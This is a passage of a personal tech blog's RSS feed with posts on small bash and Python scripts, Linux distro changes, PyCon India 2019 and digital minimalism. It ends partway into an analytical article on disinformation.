2121<span class="nv">light</span><span class="o">=</span><span class="s2">"</span><span class="k">$(</span>xres color8<span class="k">)</span><span class="s2">"</span>
2122
2123<span class="nv">USER</span><span class="o">=</span><span class="s2">"icyphox"</span>
2124<span class="nv">URL</span><span class="o">=</span><span class="s2">"http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks"</span>
2125<span class="nv">URL</span><span class="o">+=</span><span class="s2">"&user=</span><span class="nv">$USER</span><span class="s2">&api_key=</span><span class="nv">$API_KEY</span><span class="s2">&format=json&limit=1&nowplaying=true"</span>
2126<span class="nv">NOTPLAYING</span><span class="o">=</span><span class="s2">" "</span> <span class="c1"># I like to have it show nothing</span>
2127<span class="nv">RES</span><span class="o">=</span><span class="k">$(</span>curl -s <span class="nv">$URL</span><span class="k">)</span>
2128<span class="nv">NOWPLAYING</span><span class="o">=</span><span class="k">$(</span>jq <span class="s1">'.recenttracks.track[0]."@attr".nowplaying'</span> <span class="o"><<<</span> <span class="s2">"</span><span class="nv">$RES</span><span class="s2">"</span> <span class="p">|</span> tr -d <span class="s1">'"'</span><span class="k">)</span>
2129
2130
2131<span class="k">if</span> <span class="o">[[</span> <span class="s2">"</span><span class="nv">$NOWPLAYING</span><span class="s2">"</span> <span class="o">=</span> <span class="s2">"true"</span> <span class="o">]]</span>
2132<span class="k">then</span>
2133 <span class="nv">TRACK</span><span class="o">=</span><span class="k">$(</span>jq <span class="s1">'.recenttracks.track[0].name'</span> <span class="o"><<<</span> <span class="s2">"</span><span class="nv">$RES</span><span class="s2">"</span> <span class="p">|</span> tr -d <span class="s1">'"'</span><span class="k">)</span>
2134 <span class="nv">ARTIST</span><span class="o">=</span><span class="k">$(</span>jq <span class="s1">'.recenttracks.track[0].artist."#text"'</span> <span class="o"><<<</span> <span class="s2">"</span><span class="nv">$RES</span><span class="s2">"</span> <span class="p">|</span> tr -d <span class="s1">'"'</span><span class="k">)</span>
2135 <span class="nb">echo</span> -ne <span class="s2">"%{F</span><span class="nv">$light</span><span class="s2">}</span><span class="nv">$TRACK</span><span class="s2"> %{F</span><span class="nv">$fg</span><span class="s2">}by </span><span class="nv">$ARTIST</span><span class="s2">"</span>
2136<span class="k">else</span>
2137 <span class="nb">echo</span> -ne <span class="s2">"</span><span class="nv">$NOTPLAYING</span><span class="s2">"</span>
2138<span class="k">fi</span>
2139</code></pre></div>
2140
2141<p>The <code>source</code> command is used to fetch the API key which I store at
2142<code>~/.lastfm</code>. The <code>fg</code> and <code>light</code> variables can be ignored, they’re only
2143for coloring output on my bar. The rest is fairly trivial and just
2144involves JSON parsing with <a href="https://stedolan.github.io/jq/"><code>jq</code></a>.
2145That’s it! It’s so small, but I learnt a ton. For those curious, here’s
2146what it looks like running:</p>
2147
2148<p><img src="/static/img/now_playing.png" alt="now playing status polybar" /></p>
2149
2150<h2 id="update-latest-post-on-the-index-page">Update latest post on the index page</h2>
2151
2152<p>This pertains to this very blog that you’re reading. I wanted a quick
2153way to update the “latest post” section in the home page and the
2154<a href="/blog">blog</a> listing, with a link to the latest post. This would require
2155editing the Markdown <a href="https://github.com/icyphox/site/tree/master/pages">source</a>
2156of both pages.</p>
2157
2158<p>This was a very
2159interesting challenge to me, primarily because it requires in-place
2160editing of the file, not just appending. Sure, I could’ve come up with
2161some <code>sed</code> one-liner, but that didn’t seem very fun. Also I hate
2162regexes. Did a lot of research (read: Googling) on in-place editing of
2163files in Python, sorting lists of files by modification time etc. and
2164this is what I ended up on, ultimately:</p>
2165
2166<div class="codehilite"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
2167
2168<span class="kn">from</span> <span class="nn">markdown2</span> <span class="kn">import</span> <span class="n">markdown_path</span>
2169<span class="kn">import</span> <span class="nn">os</span>
2170<span class="kn">import</span> <span class="nn">fileinput</span>
2171<span class="kn">import</span> <span class="nn">sys</span>
2172
2173<span class="c1"># change our cwd</span>
2174<span class="n">os</span><span class="o">.</span><span class="n">chdir</span><span class="p">(</span><span class="s2">"bin"</span><span class="p">)</span>
2175
2176<span class="n">blog</span> <span class="o">=</span> <span class="s2">"../pages/blog/"</span>
2177
2178<span class="c1"># get the most recently created file</span>
2179<span class="k">def</span> <span class="nf">getrecent</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
2180 <span class="n">files</span> <span class="o">=</span> <span class="p">[</span><span class="n">path</span> <span class="o">+</span> <span class="n">f</span> <span class="k">for</span> <span class="n">f</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">blog</span><span class="p">)</span> <span class="k">if</span> <span class="n">f</span> <span class="ow">not</span> <span class="ow">in</span> <span class="p">[</span><span class="s2">"_index.md"</span><span class="p">,</span> <span class="s2">"feed.xml"</span><span class="p">]]</span>
2181 <span class="n">files</span><span class="o">.</span><span class="n">sort</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">getmtime</span><span class="p">,</span> <span class="n">reverse</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
2182 <span class="k">return</span> <span class="n">files</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
2183
2184<span class="c1"># adding an entry to the markdown table</span>
2185<span class="k">def</span> <span class="nf">update_index</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
2186 <span class="n">path</span> <span class="o">=</span> <span class="s2">"../pages/_index.md"</span>
2187 <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
2188 <span class="n">md</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">readlines</span><span class="p">()</span>
2189 <span class="n">ruler</span> <span class="o">=</span> <span class="n">md</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s2">"| --- | --: |</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
2190 <span class="n">md</span><span class="p">[</span><span class="n">ruler</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">s</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span>
2191
2192 <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
2193 <span class="n">f</span><span class="o">.</span><span class="n">writelines</span><span class="p">(</span><span class="n">md</span><span class="p">)</span>
2194
2195<span class="c1"># editing the md source in-place</span>
2196<span class="k">def</span> <span class="nf">update_blog</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
2197 <span class="n">path</span> <span class="o">=</span> <span class="s2">"../pages/blog/_index.md"</span>
2198 <span class="n">s</span> <span class="o">=</span> <span class="n">s</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span>
2199 <span class="k">for</span> <span class="n">l</span> <span class="ow">in</span> <span class="n">fileinput</span><span class="o">.</span><span class="n">FileInput</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">inplace</span><span class="o">=</span><span class="mi">1</span><span class="p">):</span>
2200 <span class="k">if</span> <span class="s2">"--:"</span> <span class="ow">in</span> <span class="n">l</span><span class="p">:</span>
2201 <span class="n">l</span> <span class="o">=</span> <span class="n">l</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l</span> <span class="o">+</span> <span class="n">s</span><span class="p">)</span>
2202 <span class="nb">print</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s2">""</span><span class="p">),</span>
2203
2204
2205<span class="c1"># fetch title and date</span>
2206<span class="n">meta</span> <span class="o">=</span> <span class="n">markdown_path</span><span class="p">(</span><span class="n">getrecent</span><span class="p">(</span><span class="n">blog</span><span class="p">),</span> <span class="n">extras</span><span class="o">=</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">])</span><span class="o">.</span><span class="n">metadata</span>
2207<span class="n">fname</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">basename</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">splitext</span><span class="p">(</span><span class="n">getrecent</span><span class="p">(</span><span class="n">blog</span><span class="p">))[</span><span class="mi">0</span><span class="p">])</span>
2208<span class="n">url</span> <span class="o">=</span> <span class="s2">"/blog/"</span> <span class="o">+</span> <span class="n">fname</span>
2209<span class="n">line</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">"| [</span><span class="si">{</span><span class="n">meta</span><span class="p">[</span><span class="s1">'title'</span><span class="p">]</span><span class="si">}</span><span class="s2">](</span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="s2">) | `</span><span class="si">{</span><span class="n">meta</span><span class="p">[</span><span class="s1">'date'</span><span class="p">]</span><span class="si">}</span><span class="s2">` |"</span>
2210
2211<span class="n">update_index</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
2212<span class="n">update_blog</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
2213</code></pre></div>
2214
2215<p>I’m going to skip explaining this one out, but in essence, it’s <strong>one
2216massive hack</strong>. And in the end, that’s my point exactly. It’s very
2217hacky, but the sheer amount I learnt by writing this ~50
2218line script can’t be taught anywhere.</p>
2219
2220<p>This was partially how
2221<a href="https://github.com/icyphox/vite">vite</a> was born. It was originally
2222intended to be a script to build my site, but grew into a full-blown
2223Python package. I could’ve just
2224used an off-the-shelf static site generator
2225given that there are <a href="https://staticgen.com">so many</a> of them, but
2226I chose to write one myself.</p>
2227
2228<p>And that just about sums up what I wanted to say. The best and most fun
2229way to learn to code—write hacky scripts. You heard it here.</p>
2230]]></description><link>https://icyphox.sh/blog/hacky-scripts</link><pubDate>Thu, 24 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/hacky-scripts</guid></item><item><title>Status update</title><description><![CDATA[<p>I’ve decided to drop the “Weekly” part of the status update posts, since
2231they were never weekly and—let’s be honest—they aren’t going to be.
2232These posts are, henceforth, just “Status updates”. The date range can
2233be inferred from the post date.</p>
2234
2235<p>That said, here’s what I’ve been up to!</p>
2236
2237<h2 id="void-linux">Void Linux</h2>
2238
2239<p>Yes, I decided to ditch Alpine in favor of Void. Alpine was great,
2240really. The very comfy <code>apk</code>, ultra mnml system… but having to
2241maintain a chroot for my glibc needs was getting way too painful. And
2242the package updates are so slow! Heck, they’re still on kernel 4.xx on
2243their supposed “bleeding” <code>edge</code> repo.</p>
2244
2245<p>So yes, Void Linux it is. Still a very clean system. I’m loving it.
2246I also undervolted my system using <a href="https://github.com/georgewhewell/undervolt"><code>undervolt</code></a>
2247(-95 mV). Can’t say for sure if there’s a noticeable difference in
2248battery life though. I’ll see if I can run some tests.</p>
2249
2250<p>This <em>should</em> be the end of my distro hopping. Hopefully.</p>
2251
2252<h2 id="pycon">PyCon</h2>
2253
2254<p>Yeah yeah, enough already. Read <a href="/blog/pycon-wrap-up">my previous post</a>.</p>
2255
2256<h2 id="this-website">This website</h2>
2257
2258<p>I’ve moved out of GitHub Pages over to Netlify. This isn’t my first time
2259using Netlify, though. I used to host my old blog which ran Hugo, there.
2260I was tired of doing this terrible hack to maintain a single repo for
2261both my source (<code>master</code>) and deploy (<code>gh-pages</code>). In essence, here’s
2262what I did:</p>
2263
2264<div class="codehilite"><pre><span></span><code><span class="ch">#!/usr/bin/env bash</span>
2265
2266git push origin master
2267<span class="c1"># push contents of `build/` to the `gh-pages` branch</span>
2268git subtree push --prefix build origin gh-pages
2269</code></pre></div>
2270
2271<p>I can now simply push to <code>master</code>, and Netlify generates a build for me
2272by installing <a href="https://github.com/icyphox/vite">vite</a>, and running <code>vite
2273build</code>. Very pleasant.</p>
2274
2275<h2 id="mnmlwms-status"><code>mnmlwm</code>’s status</h2>
2276
2277<p><a href="https://github.com/minimalwm/minimal">mnmlwm</a>, for those unaware, is my pet project which aims to be a simple
2278window manager written in Nim. I’d taken a break from it for a while
2279because Xlib is such a pain to work with (or I’m just dense). Anyway,
2280I’m planning on getting back to it, with some fresh inspiration from
2281Dylan Araps’ <a href="https://github.com/dylanaraps/sowm">sowm</a>.</p>
2282
2283<h2 id="other">Other</h2>
2284
2285<p>I’ve been reading a lot of manga lately. Finished <em>Kekkon Yubiwa
2286Monogatari</em> (till the latest chapter) and <em>Another</em>, and I’ve just
2287started <em>Kakegurui</em>. I’ll reserve my opinions for when I update the
2288<a href="/reading">reading log</a>.</p>
2289
2290<p>That’s about it, and I’ll see you—definitely not next week.</p>
2291]]></description><link>https://icyphox.sh/blog/2019-10-17</link><pubDate>Wed, 16 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-10-17</guid></item><item><title>PyCon India 2019 wrap-up</title><description><![CDATA[<p>I’m writing this article as I sit in class, back on the grind. Last
2292weekend—Oct 12th and 13th—was PyCon India 2019, in Chennai, India.
2293It was my first PyCon, <em>and</em> my first ever talk at a major conference!
2294This is an account of the all the cool stuff I saw, people I met and the
2295talks I enjoyed.
2296Forgive the lack of pictures—I prefer living the moment through my
2297eyes. </p>
2298
2299<h2 id="talks">Talks</h2>
2300
2301<p>So much ML! Not that it’s a bad thing, but definitely interesting to
2302note. From what I counted, there were about 17 talks tagged under “Data
2303Science, Machine Learning and AI”. I’d have liked to see more talks
2304discussing security and privacy, but hey, the organizers can only pick
2305from what’s submitted. ;)</p>
2306
2307<p>With that point out of the way, here are some of the talks I really liked:</p>
2308
2309<ul>
2310<li><strong>Python Packaging - where we are and where we’re headed</strong> by <a href="https://twitter.com/pradyunsg">Pradyun</a></li>
2311<li><strong>Micropython: Building a Physical Inventory Search Engine</strong> by <a href="https://twitter.com/stonecharioteer">Vinay</a></li>
2312<li><strong>Ragabot - Music Encoded</strong> by <a href="https://twitter.com/vikipedia">Vikrant</a></li>
2313<li><strong>Let’s Hunt a Memory Leak</strong> by <a href="https://twitter.com/sankeyplus">Sanket</a></li>
2314<li>oh and of course, <a href="https://twitter.com/dabeaz">David Beazley</a>’s closing
2315keynote</li>
2316</ul>
2317
2318<h2 id="my-talk">My talk (!!!)</h2>
2319
2320<p>My good buddy <a href="https://twitter.com/_vologue">Raghav</a> and I spoke about
2321our smart lock security research. Agreed, it might have been less
2322“hardware” and more of a bug on the server-side, but that’s the thing
2323about IoT right? It’s so multi-faceted, and is an amalgamation of so
2324many different hardware and software stacks. But, anyway…</p>
2325
2326<p>I was reassured by folks after the talk that the silence during Q/A was
2327the “good” kind of silence. Was it really? I’ll never know.</p>
2328
2329<h2 id="some-nice-people-i-met">Some nice people I met</h2>
2330
2331<ul>
2332<li><a href="https://twitter.com/abhirathb">Abhirath</a>—A 200 IQ lad. Talked to
2333me about everything from computational biology to the physical
2334implementation of quantum computers.</li>
2335<li><a href="https://twitter.com/meain_">Abin</a>—He recognized me from my
2336<a href="https://reddit.com/r/unixporn">r/unixporn</a> posts, which was pretty
2337awesome.</li>
2338<li><a href="https://twitter.com/h6165">Abhishek</a></li>
2339<li>Pradyun and Vikrant (linked earlier)</li>
2340</ul>
2341
2342<p>And a lot of other people doing really great stuff, whose names I’m
2343forgetting.</p>
2344
2345<h2 id="pictures">Pictures!</h2>
2346
2347<p>It’s not much, and
2348I can’t be bothered to format them like a collage or whatever, so I’ll
2349just dump them here—as is.</p>
2350
2351<p><img src="/static/img/silly_badge.jpg" alt="nice badge" />
2352<img src="/static/img/abhishek_anmol.jpg" alt="awkward smile!" />
2353<img src="/static/img/me_talking.jpg" alt="me talking" />
2354<img src="/static/img/s443_pycon.jpg" alt="s443 @ pycon" /></p>
2355
2356<h2 id="cest-tout">C’est tout</h2>
2357
2358<p>Overall, a great time and a weekend well spent. It was very different
2359from your typical security conference—a lot more <em>chill</em>, if you
2360will. The organizers did a fantastic job and the entire event was put
2361together really well.
2362I don’t have much else to say, but I know for sure that I’ll be
2363there next time.</p>
2364
2365<p>That was PyCon India, 2019.</p>
2366]]></description><link>https://icyphox.sh/blog/pycon-wrap-up</link><pubDate>Tue, 15 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/pycon-wrap-up</guid></item><item><title>Thoughts on digital minimalism</title><description><![CDATA[<p>Ah yes, yet another article on the internet on this beaten to death
2367subject. But this is inherently different, since it’s <em>my</em> opinion on
2368the matter, and <em>my</em> technique(s) to achieve “digital minimalism”.</p>
2369
2370<p>According to me, minimalism can be achieved on two primary fronts –
2371the phone & the computer. Let’s start with the phone. The daily carry.
2372The device that’s on our person from when we get out of bed, till we get
2373back in bed.</p>
2374
2375<h2 id="the-phone">The phone</h2>
2376
2377<p>I’ve read about a lot of methods people employ to curb their phone
2378usage. Some have tried grouping “distracting” apps into a separate
2379folder, and this supposedly helps reduce their usage. Now, I fail to see
2380how this would work, but YMMV. Another technique I see often is using
2381a time governance app—like OnePlus’ Zen Mode—to enforce how much
2382time you spend using specific apps, or the phone itself. I’ve tried this
2383for myself, but I constantly found myself counting down the minutes
2384after which the phone would become usable again. Not helpful.</p>
2385
2386<p>My solution to this is a lot more brutal. I straight up uninstalled the
2387apps that I found myself using too often. There’s a simple principle
2388behind it—if the app has a desktop alternative, like Twitter,
2389Reddit, etc. use that instead. Here’s a list of apps that got nuked from
2390my phone:</p>
2391
2392<ul>
2393<li>Twitter</li>
2394<li>Instagram (an exception, no desktop client)</li>
2395<li>Relay for Reddit</li>
2396<li>YouTube (disabled, ships with stock OOS)</li>
2397</ul>
2398
2399<p>The only non-productive app that I’ve let remain is Clover,
2400a 4chan client. I didn’t find myself using it as much earlier, but we’ll see how that
2401holds up. I’ve also allowed my personal messaging apps to remain, since
2402removing those would be inconveniencing others.</p>
2403
2404<p>I must admit, I often find myself reaching for my phone out of habit
2405just to check Twitter, only to find that its gone. I also subconsciously
2406tap the place where its icon used to exist (now replaced with my mail
2407client) on my launcher. The only “fun” thing left on my phone to do is
2408read or listen to music. Which is okay, in my opinion.</p>
2409
2410<h2 id="the-computer">The computer</h2>
2411
2412<p>I didn’t do anything too nutty here, and most of the minimalism is
2413mostly aesthetic. I like UIs that get out of the way. </p>
2414
2415<p>My setup right now is just a simple bar at the top showing the time,
2416date, current volume and battery %, along with my workspace indicators.
2417No fancy colors, no flashy buttons and sliders. And that’s it. I don’t
2418try to force myself to not use stuff—after all, I’ve reduced it
2419elsewhere. :)</p>
2420
2421<p>Now the question arises: Is this just a phase, or will I stick to it?
2422What’s going to stop me from heading over to the Play Store and
2423installing those apps back? Well, I never said this was going to be
2424easy. There’s definitely some will power needed to pull this off.
2425I guess time will tell.</p>
2426]]></description><link>https://icyphox.sh/blog/digital-minimalism</link><pubDate>Sat, 05 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/digital-minimalism</guid></item><item><title>Weekly status update, 09/17–09/27</title><description><![CDATA[<p>It’s a lazy Friday afternoon here; yet another off day this week thanks to my
2427uni’s fest. My last “weekly” update was 10 days ago, and a lot has happened
2428since then. Let’s get right into it!</p>
2429
2430<h2 id="my-switch-to-alpine">My switch to Alpine</h2>
2431
2432<p>Previously, I ran Debian with Buster/Sid repos, and ever since this happened</p>
2433
2434<div class="codehilite"><pre><span></span><code>$ dpkg --list <span class="p">|</span> wc -l
2435<span class="m">3817</span>
2436
2437<span class="c1"># or something in that ballpark</span>
2438</code></pre></div>
2439
2440<p>I’ve been wanting to reduce my system’s package count.</p>
2441
2442<p>Thus, I began my search for a smaller, simpler and lighter distro with a fairly
2443sane package manager. I did come across Dylan Araps’
2444<a href="https://getkiss.org">KISS Linux</a> project, but it seemed a little too hands-on
2445for me (and still relatively new). I finally settled on
2446<a href="https://alpinelinux.org">Alpine Linux</a>. According to their website:</p>
2447
2448<blockquote>
2449 <p>Alpine Linux is a security-oriented, lightweight Linux distribution based
2450 on musl libc and busybox.</p>
2451</blockquote>
2452
2453<p>The installation was a breeze, and I was quite surprised to see WiFi working
2454OOTB. In the past week of my using this distro, the only major hassle I faced
2455was getting my Minecraft launcher to run. The JRE isn’t fully ported to <code>musl</code>
2456yet.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup> The solution to that is fairly trivial and I plan to write about it
2457soon. (hint: it involves chroots)</p>
2458
2459<p><img src="/static/img/rice-2019-09-27.png" alt="rice" /></p>
2460
2461<h2 id="packaging-for-alpine">Packaging for Alpine</h2>
2462
2463<p>On a related note, I’ve been busy packaging some of the stuff I use for Alpine
2464– you can see my personal <a href="https://github.com/icyphox/aports">aports</a>
2465repository if you’re interested. I’m currently working on packaging Nim too, so
2466keep an eye out for that in the coming week.</p>
2467
2468<h2 id="talk-selection-at-pycon-india">Talk selection at PyCon India!</h2>
2469
2470<p>Yes! My buddy Raghav (<a href="https://twitter.com/_vologue">@_vologue</a>) and I are
2471going to be speaking at PyCon India about our recent smart lock security
2472research. The conference is happening in Chennai, much to our convenience.
2473If you’re attending too, hit me up on Twitter and we can hang!</p>
2474
2475<h2 id="other">Other</h2>
2476
2477<p>That essentially sums up the <em>technical</em> stuff that I did. My Russian is going
2478strong, my reading however, hasn’t. I have <em>yet</em> to finish those books! This
2479week, for sure.</p>
2480
2481<p>Musically, I’ve been experimenting. I tried a bit of hip-hop and chilltrap, and
2482I think I like it? I still find myself coming back to metalcore/deathcore.
2483Here’s a list of artists I discovered (and liked) recently:</p>
2484
2485<ul>
2486<li><a href="https://www.youtube.com/watch?v=r3uKGwcwGWA">Before I Turn</a></li>
2487<li>生 Conform 死 (couldn’t find any official YouTube video, check Spotify)</li>
2488<li><a href="https://www.youtube.com/watch?v=66eFK1ttdC4">Treehouse Burning</a></li>
2489<li><a href="https://www.youtube.com/watch?v=m-w3XM2PwOY">Lee McKinney</a></li>
2490<li><a href="https://www.youtube.com/watch?v=cUibXK7F3PM">Berried Alive</a> (rediscovered)</li>
2491</ul>
2492
2493<p>That’s it for now, I’ll see you next week!</p>
2494
2495<div class="footnotes">
2496<hr />
2497<ol>
2498<li id="fn-1">
2499<p>The <a href="https://aboullaite.me/protola-alpine-java/">Portola Project</a> <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
2500</li>
2501</ol>
2502</div>
2503]]></description><link>https://icyphox.sh/blog/2019-09-27</link><pubDate>Fri, 27 Sep 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-09-27</guid></item><item><title>Weekly status update, 09/08–09/17</title><description><![CDATA[<p>This is something new I’m trying out, in an effort to write more frequently
2504and to serve as a log of how I’m using my time. In theory, I will write this post
2505every week. I’ll need someone to hold me accountable if I don’t. I have yet to decide on
2506a format for this, but it will probably include a quick summary of the work I did,
2507things I read, IRL stuff, etc.</p>
2508
2509<p>With the meta stuff out of the way, here’s what went down last week!</p>
2510
2511<h2 id="my-discovery-of-the-xxiivv-webring">My discovery of the XXIIVV webring</h2>
2512
2513<p>Did you notice the new fidget-spinner-like logo at the bottom? Click it! It’s a link to
2514the <a href="https://webring.xxiivv.com">XXIIVV webring</a>. I really like the idea of webrings.
2515It creates a small community of sites and enables sharing of traffic among these sites.
2516The XXIIVV webring consists mostly of artists, designers and developers and gosh, some
2517of those sites are beautiful. Mine pales in comparison.</p>
2518
2519<p>The webring also has a <a href="https://github.com/buckket/twtxt">twtxt</a> echo chamber aptly
2520called <a href="https://webring.xxiivv.com/hallway.html">The Hallway</a>. twtxt is a fantastic project
2521and its complexity-to-usefulness ratio greatly impresses me. You can find my personal
2522twtxt feed at <code>/twtxt.txt</code> (root of this site).</p>
2523
2524<p>Which brings me to the next thing I did this/last week.</p>
2525
2526<h2 id="twsh-a-twtxt-client-written-in-bash"><code>twsh</code>: a twtxt client written in Bash</h2>
2527
2528<p>I’m not a fan of the official Python client, because you know, Python is bloat.
2529As an advocate of <em>mnmlsm</em>, I can’t use it in good conscience. Thus, began my
2530authorship of a truly mnml client in pure Bash. You can find it <a href="https://github.com/icyphox/twsh">here</a>.
2531It’s not entirely useable as of yet, but it’s definitely getting there, with the help
2532of <a href="https://nerdypepper.me">@nerdypepper</a>.</p>
2533
2534<h2 id="other">Other</h2>
2535
2536<p>I have been listening to my usual podcasts: Crime Junkie, True Crime Garage,
2537Darknet Diaries & Off the Pill. To add to this list, I’ve begun binging Vice’s CYBER.
2538It’s pretty good—each episode is only about 30 mins and it hits the sweet spot,
2539delvering both interesting security content and news.</p>
2540
2541<p>My reading needs a ton of catching up. Hopefully I’ll get around to finishing up
2542“The Unending Game” this week. And then go back to “Terrorism and Counterintelligence”.</p>
2543
2544<p>I’ve begun learning Russian! I’m really liking it so far, and it’s been surprisingly
2545easy to pick up. Learning the Cyrillic script will require some relearning, especially
2546with letters like в, н, р, с, etc. that look like English but sound entirely different.
2547I think I’m pretty serious about learning this language—I’ve added the Russian keyboard
2548to my Google Keyboard to aid in my familiarization of the alphabet. I’ve added the <code>RU</code>
2549layout to my keyboard map too:</p>
2550
2551<pre><code>setxkbmap -option 'grp:alt_shift_toggle' -layout us,ru
2552</code></pre>
2553
2554<p>With that ends my weekly update, and I’ll see you next week!</p>
2555]]></description><link>https://icyphox.sh/blog/2019-09-17</link><pubDate>Tue, 17 Sep 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-09-17</guid></item><item><title>Disinformation demystified</title><description><![CDATA[<p>As with the disambiguation of any word, let’s start with its etymology and definiton.
2556According to <a href="https://en.wikipedia.org/wiki/Disinformation">Wikipedia</a>,
2557<em>disinformation</em> has been borrowed from the Russian word — <em>dezinformatisya</em> (дезинформа́ция),
2558derived from the title of a KGB black propaganda department.</p>
2559
2560<blockquote>
2561 <p>Disinformation is false information spread deliberately to deceive.</p>
2562</blockquote>
2563
2564<p>To fully understand disinformation, especially in the modern age, we need to understand the
2565key factors of any successful disinformation operation:</p>
2566
2567<ul>
2568<li>creating disinformation (what)</li>
2569<li>the motivation behind the op, or its end goal (why)</li>
2570<li>the medium used to disperse the falsified information (how)</li>
2571<li>the actor (who)</li>
2572</ul>
2573
2574<p>At the end, we’ll also look at how you can use disinformation techniques to maintain OPSEC.</p>
2575
2576<p>In order to break monotony, I will also be using the terms “information operation”, or the shortened
2577forms—"info op” & “disinfo”.</p>
2578
2579<h2 id="creating-disinformation">Creating disinformation</h2>
2580
2581<p>Crafting or creating disinformation is by no means a trivial task. Often, the quality
2582of any disinformation sample is a huge indicator of the level of sophistication of the
2583actor involved, i.e. is it a 12 year old troll or a nation state?</p>
2584
2585<p>Well crafted disinformation always has one primary characteristic — “plausibility”.
2586The disinfo must sound reasonable. It must induce the notion it’s <em>likely</em> true.
2587To achieve this, the target — be it an individual, a specific demographic or an entire
2588nation — must be well researched. A deep understanding of the target’s culture, history,
2589geography and psychology is required. It also needs circumstantial and situational awareness,
2590of the target.</p>
2591
2592<p>There are many forms of disinformation. A few common ones are staged videos / photographs,
2593recontextualized videos / photographs, blog posts, news articles & most recently — deepfakes.</p>
2594
2595<p>Here’s a tweet from <a href="https://twitter.com/thegrugq">the grugq</a>, showing a case of recontextualized
2596imagery:</p>
2597
2598<blockquote class="twitter-tweet" data-dnt="true" data-theme="dark" data-link-color="#00ffff">
2599<p lang="en" dir="ltr">Disinformation.
2600<br><br>
2601The content of the photo is not fake. The reality of what it captured is fake. The context it’s placed in is fake. The picture itself is 100% authentic. Everything, except the photo itself, is fake.
2602<br><br>Recontextualisation as threat vector.
2603<a href="https://t.co/Pko3f0xkXC">pic.twitter.com/Pko3f0xkXC</a>
2604</p>— thaddeus e. grugq (@thegrugq)
2605<a href="https://twitter.com/thegrugq/status/1142759819020890113?ref_src=twsrc%5Etfw">June 23, 2019</a>
2606</blockquote>
2607
2608<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
2609
2610<h2 id="motivations-behind-an-information-operation">Motivations behind an information operation</h2>
2611
2612<p>I like to broadly categorize any info op as either proactive or reactive.
2613Proactively, disinformation is spread with the desire to influence the target
2614either before or during the occurence of an event. This is especially observed
2615during elections.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup>
2616In offensive information operations, the target’s psychological state can be affected by
2617spreading <strong>fear, uncertainty & doubt</strong>, or FUD for short.</p>
2618
2619<p>Reactive disinformation is when the actor, usually a nation state in this case,
2620screws up and wants to cover their tracks. A fitting example of this is the case
2621of Malaysian Airlines Flight 17 (MH17), which was shot down while flying over
2622eastern Ukraine. This tragic incident has been attributed to Russian-backed
2623separatists.<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup>
2624Russian media is known to have desseminated a number of alternative & some even
2625conspiratorial theories<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>, in response. The number grew as the JIT’s (Dutch-lead Joint
2626Investigation Team) investigations pointed towards the separatists.
2627The idea was to <strong>muddle the information</strong> space with these theories, and as a result,
2628potentially correct information takes a credibility hit.</p>
2629
2630<p>Another motive for an info op is to <strong>control the narrative</strong>. This is often seen in use
2631in totalitarian regimes; when the government decides what the media portrays to the
2632masses. The ongoing Hong Kong protests is a good example.<sup class="footnote-ref" id="fnref-4"><a href="#fn-4">4</a></sup> According to <a href="https://www.npr.org/2019/08/14/751039100/china-state-media-present-distorted-version-of-hong-kong-protests">NPR</a>:</p>
2633
2634<blockquote>
2635 <p>Official state media pin the blame for protests on the “black hand” of foreign interference,
2636 namely from the United States, and what they have called criminal Hong Kong thugs.
2637 A popular conspiracy theory posits the CIA incited and funded the Hong Kong protesters,
2638 who are demanding an end to an extradition bill with China and the ability to elect their own leader.
2639 Fueling this theory, China Daily, a state newspaper geared toward a younger, more cosmopolitan audience,
